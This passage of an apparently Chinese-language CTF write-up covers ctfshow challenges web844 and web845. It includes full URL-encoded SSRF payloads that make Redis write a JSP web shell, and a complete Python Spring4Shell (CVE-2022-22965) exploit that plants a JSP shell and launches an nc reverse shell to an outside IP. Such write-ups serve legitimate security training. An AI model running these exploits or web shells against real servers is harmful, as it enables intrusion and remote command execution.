        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(config);
        oos.close();

        String base64Str = Base64.getEncoder().encodeToString(barr.toByteArray());
        String urlEncoded = URLEncoder.encode(base64Str, "UTF-8");
        System.out.println(urlEncoded);
    }
}

web844

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.ctfshow.controller;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.Socket;
import java.util.Map;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.servlet.ModelAndView;

@Controller
@RequestMapping({"/"})
public class IndexController {
    @RequestMapping(
        value = {"/"},
        method = {RequestMethod.GET},
        produces = {"text/html;charset=utf-8"}
    )
    public ModelAndView index() {
        ModelAndView modelAndView = new ModelAndView();
        modelAndView.setViewName("index");
        return modelAndView;
    }

    @RequestMapping(
        value = {"/goPage"},
        method = {RequestMethod.GET}
    )
    @ResponseBody
    public String goPage(@RequestParam Map<String, String> param) {
        String result = "";
        String request = "";
        String url = (String)param.get("url");
        String port = (String)param.get("port");
        if (null != url && null != param && !param.isEmpty()) {
            try {
                Socket socket = new Socket(url, Integer.valueOf(port));
                OutputStream out = socket.getOutputStream();
                BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream(), "UTF-8"));

                for(Map.Entry<String, String> p : param.entrySet()) {
                    request = request + (String)p.getKey() + (String)p.getValue() + "\r\n";
                }

                out.write(request.getBytes());

                String line;
                while((line = in.readLine()) != null) {
                    result = result + line;
                }
            } catch (Exception e) {
                e.printStackTrace();
                result = "request error";
            }

            return result;
        } else {
            result = "url error";
            return result;
        }
    }
}

goPage 方法遍历所有参数并进行 tcp 连接，明显的 ssrf 漏洞，并且发现后端有 redis 服务

1
/goPage?url=127.0.0.1&port=6379&config%20set%20dir%20%2fusr%2flocal%2ftomcat%2fwebapps%2fROOT%2f%0d%0aconfig%20set%20dbfilename%20d.jsp%0d%0aset%20x%20%22%5cn%5cn%3c%25%20Runtime.getRuntime().exec(request.getParameter(%5c%22cmd%5c%22))%3b%25%3e%5cn%5cn%22%0d%0asave%0d%0aquit=

一口气执行完，避免 java 连接时等待结果无反应导致超时

1
2
3
/d.jsp?cmd=cp%20/flag%20/usr/local/tomcat/webapps/ROOT/flag.txt

/flag.txt

还是想着有回显的会方便点，多次调整，主要是需要设置config set rdbcompression no，不然 Redis 默认开启了 RDB 压缩，木马内容就乱了

1
/goPage?url=127.0.0.1&port=6379&config%20set%20dir%20%2fusr%2flocal%2ftomcat%2fwebapps%2fROOT%2f%0d%0aconfig%20set%20dbfilename%20f.jsp%0d%0aconfig%20set%20rdbcompression%20no%0d%0aset%20x%20%22%5cn%5cn%3c%25%20if(request.getParameter(%5c%22cmd%5c%22)!%3dnull)%7b%20java.io.InputStream%20in%20%3d%20Runtime.getRuntime().exec(request.getParameter(%5c%22cmd%5c%22)).getInputStream()%3b%20int%20a%20%3d%20-1%3b%20byte%5b%5d%20b%20%3d%20new%20byte%5b2048%5d%3b%20while((a%3din.read(b))!%3d-1)%7b%20out.println(new%20String(b))%3b%20%7d%20%7d%20%25%3e%5cn%5cn%22%0d%0asave%0d%0aquit=

web845

📎readMe.pdf

看文章就能复现出来，Spring4Shell (CVE-2022-22965)，想打那种不带 header 的表达式注入的，但是好像没成功

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
import httpx
import time
import warnings

warnings.filterwarnings("ignore")

url = "https://55a15450-587d-494f-a977-5093475b57a1.challenge.ctf.show/"
reverse_shell_cmd = "nc 154.36.181.12 12345 -e /bin/sh"

def exploit():
    client = httpx.Client(verify=False, timeout=10.0)
    
    jsp_payload = '<% { String x=request.getParameter(new String(new byte[]{97})); if(x!=null){Runtime.getRuntime().exec(x);} } %>'
    
    headers = {
        "p": jsp_payload,
        "User-Agent": "Mozilla/5.0"
    }

    params = {
        "class.module.classLoader.resources.context.parent.pipeline.first.pattern": "%{p}i",
        "class.module.classLoader.resources.context.parent.pipeline.first.suffix": ".jsp",
        "class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT",
        "class.module.classLoader.resources.context.parent.pipeline.first.prefix": "shell_ok", 
        "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat": ""
    }

    try:
        print(f"[*] Target: {url}")
        
        client.get(url, headers=headers, params=params)
        
        for _ in range(5):
            client.get(url, headers=headers)
            time.sleep(0.5)
        
        shell_url = url + "shell_ok.jsp"
        time.sleep(2)
        
        check = client.get(shell_url)
        if check.status_code == 200:
            print(f"[+] Shell confirmed at: {shell_url}")
            print(f"[*] Executing reverse shell: {reverse_shell_cmd}")
            
            try:
                client.get(shell_url, params={"a": reverse_shell_cmd}, timeout=2.0)
            except httpx.ReadTimeout:
                print("[+] Request timed out (Expected for reverse shell). Check your listener!")
        else:
            print(f"[-] Shell check failed with status: {check.status_code}")

    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        client.close()

if __name__ == "__main__":
    exploit()

运行一次不行再运行一次，靶机可能初始化有点久

小结

jwt 和 sql 注入那题比较麻烦，其他题目做起来都挺顺利的（可能是因为这是22年的题目了吧😸